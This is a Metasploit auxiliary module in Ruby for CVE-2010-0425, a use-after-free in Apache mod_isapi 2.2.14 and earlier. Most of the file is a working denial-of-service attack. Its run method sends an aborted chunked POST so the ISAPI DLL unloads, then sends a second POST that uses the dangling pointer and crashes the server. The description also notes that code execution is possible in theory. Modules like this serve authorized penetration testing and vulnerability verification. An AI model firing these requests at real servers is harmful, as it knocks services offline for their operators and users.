1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Tcp
8
  include Msf::Auxiliary::Dos
9

10
  def initialize(info = {})
11
    super(
12
      update_info(
13
        info,
14
        'Name' => 'Apache mod_isapi Dangling Pointer',
15
        'Description' => %q{
16
          This module triggers a use-after-free vulnerability in the Apache
17
          Software Foundation mod_isapi extension for versions 2.2.14 and earlier.
18
          In order to reach the vulnerable code, the target server must have an
19
          ISAPI module installed and configured.
20

21
          By making a request that terminates abnormally (either an aborted TCP
22
          connection or an unsatisfied chunked request), mod_isapi will unload the
23
          ISAPI extension. Later, if another request comes for that ISAPI module,
24
          previously obtained pointers will be used resulting in an access
25
          violation or potentially arbitrary code execution.
26

27
          Although arbitrary code execution is theoretically possible, a
28
          real-world method of invoking this consequence has not been proven. In
29
          order to do so, one would need to find a situation where a particular
30
          ISAPI module loads at an image base address that can be re-allocated by
31
          a remote attacker.
32

33
          Limited success was encountered using two separate ISAPI modules. In
34
          this scenario, a second ISAPI module was loaded into the same memory
35
          area as the previously unloaded module.
36
        },
37
        'Author' => [
38
          'Brett Gervasoni', # original discovery
39
          'jduck'
40
        ],
41
        'License' => MSF_LICENSE,
42
        'References' => [
43
          [ 'CVE', '2010-0425' ],
44
          [ 'OSVDB', '62674'],
45
          [ 'BID', '38494' ],
46
          [ 'URL', 'https://bz.apache.org/bugzilla/show_bug.cgi?id=48509' ],
47
          [ 'URL', 'https://web.archive.org/web/20100715032229/http://www.gossamer-threads.com/lists/apache/cvs/381537' ],
48
          [ 'URL', 'http://www.senseofsecurity.com.au/advisories/SOS-10-002' ],
49
          [ 'EDB', '11650' ]
50
        ],
51
        'DisclosureDate' => '2010-03-05',
52
        'Notes' => {
53
          'Stability' => [CRASH_SERVICE_DOWN],
54
          'SideEffects' => [],
55
          'Reliability' => []
56
        }
57
      )
58
    )
59

60
    register_options([
61
      Opt::RPORT(80),
62
      OptString.new('ISAPI', [ true, 'ISAPI URI to request', '/cgi-bin/SMTPSend.dll' ])
63
    ])
64
  end
65

66
  def run
67
    server_ip = datastore['RHOST']
68
    if (datastore['RPORT'].to_i != 80)
69
      server_ip += ':' + datastore['RPORT'].to_s
70
    end
71
    isapi_uri = datastore['ISAPI']
72

73
    # Create a stale pointer using the vulnerability
74
    print_status('Causing the ISAPI dll to be loaded and unloaded...')
75
    unload_trigger = 'POST ' + isapi_uri + " HTTP/1.0\r\n" \
76
                     "Pragma: no-cache\r\n" \
77
                     "Proxy-Connection: Keep-Alive\r\n" \
78
                     'Host: ' + server_ip + "\r\n" \
79
                     "Transfer-Encoding: chunked\r\n" \
80
                     "Content-Length: 40334\r\n\r\n" +
81
                     Rex::Text.rand_text_alphanumeric(128..255)
82
    connect
83
    sock.put(unload_trigger)
84
    disconnect
85

86
    # Now make the stale pointer get used...
87
    print_status('Triggering the crash ...')
88
    data = Rex::Text.rand_text_alphanumeric(1337..1592)
89
    crash_trigger = 'POST ' + isapi_uri + " HTTP/1.0\r\n" \
90
                    'Host: ' + server_ip + "\r\n" \
91
                    "Content-Length: #{data.length}\r\n\r\n" +
92
                    data
93

94
    connect
95
    sock.put(crash_trigger)
96
    disconnect
97
  end
98
end
99

100